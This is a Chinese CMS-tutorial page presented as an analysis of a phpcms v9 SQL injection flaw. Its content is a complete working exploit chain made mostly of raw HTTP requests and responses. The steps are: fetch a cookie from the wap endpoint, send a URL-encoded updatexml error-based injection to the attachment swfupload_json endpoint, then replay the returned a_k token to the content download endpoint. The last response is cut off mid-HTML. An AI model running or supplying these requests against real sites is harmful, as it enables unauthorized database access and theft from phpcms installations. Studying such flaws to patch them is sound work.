您现在的位置是：首页 > cms教程 > phpcms教程phpcms教程

phpcmsv9注入漏洞分析

钱锦宏2025-05-20 14:04:56phpcms教程已有3人查阅

导读首先访问上述的url,返回的数据如下你访问的站点不存在或者未开启wap访问复制上述返回数据中的红色cookie值上述的src为sql注入的语句，post中的userid_flash为上述的红色cookie值

GET /phpcms/index.php?m=wap&c=index&a=init&siteid=1 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: nYbXT_siteid=8f34EZvyi7oJBh8g69s3wO0YGxWeF_ohQ8serAzU; CNZZDATA1256104530=

首先访问上述的url,返回的数据如下

HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 17:29:08 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Set-Cookie: nYbXT_siteid=a504MiYFpsbeMmu-WUkntLfOSbQAJa61keJ3OvHN
Vary: Accept-Encoding
Content-Length: 35
Content-Type: text/html; charset=gbk

你访问的站点不存在或者未开启wap访问
复制上述返回数据中的红色cookie值
访问下述url

POST /phpcms/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3D%25%2A27%20and%20updatexml%281%2CCONCAT%281%2C%28SELECT%20table_name%20FROM%20information_schema.%60TABLES%60%20WHERE%20RIGHT%28table_name%2C10%29%3D%25%2A27admin_role%25%2A27%20LIMIT%200%2C1%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x- -form-urlencoded
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: nYbXT_siteid=1464mbfPNyq9TWB2vKrI0h9yNabsKQf8NI4dqH3c; CNZZDATA1256104530=
Content-Length: 57
userid_flash=a504MiYFpsbeMmu-WUkntLfOSbQAJa61keJ3OvHN

上述的src为sql注入的语句，post中的userid_flash为上述的红色cookie值
返回如下：

HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 17:30:02 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Set-Cookie: PHPSESSID=oj9abeufn86ajm9md7a2n8bjl4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: nYbXT_att_json=361aaa6lxxMUbdOiRKJjYjqdfLNj00tx1X6SSMesMq_-CijdCEwNjdwuPRyRpX-0E_xaXKzDfp1Bd-oAcmU73m91J-SA50PFYL-seSNzmnNqLEaBwILc3Nv00Eeg4a86xm3Jy_37V9YErAhYTFM7HEyHppebJGjwX-MlGr82wA8xOmR9P3Xm3HVQNdyPm57PUbuKBLJL1ZEoJXTLrpPWHpSFg2aXp32hU30c3TuXv_DQvzDYbUKZvZiFSSxgY4Le7IwgEyfeZzlfpOdtHUquuaVs-idCILJSNEq_6pKfqpX7Gz0edoDEuhYQLQ
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=gbk

将上述标记颜色的值复制到一下payload中，即可完成注入

GET /phpcms//index.php?m=content&c=down&a_k=361aaa6lxxMUbdOiRKJjYjqdfLNj00tx1X6SSMesMq_-CijdCEwNjdwuPRyRpX-0E_xaXKzDfp1Bd-oAcmU73m91J-SA50PFYL-seSNzmnNqLEaBwILc3Nv00Eeg4a86xm3Jy_37V9YErAhYTFM7HEyHppebJGjwX-MlGr82wA8xOmR9P3Xm3HVQNdyPm57PUbuKBLJL1ZEoJXTLrpPWHpSFg2aXp32hU30c3TuXv_DQvzDYbUKZvZiFSSxgY4Le7IwgEyfeZzlfpOdtHUquuaVs-idCILJSNEq_6pKfqpX7Gz0edoDEuhYQLQ HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: nYbXT_siteid=; CNZZDATA1256104530=

HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 17:30:10 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Vary: Accept-Encoding
Content-Length: 685
Content-Type: text/html; charset=gbk
<div style="font-size:12px;text-align:left; border:1px solid #9cc9e0; padding:1px 4px;color:#000000;font-family:Arial, Helvetica,sans-serif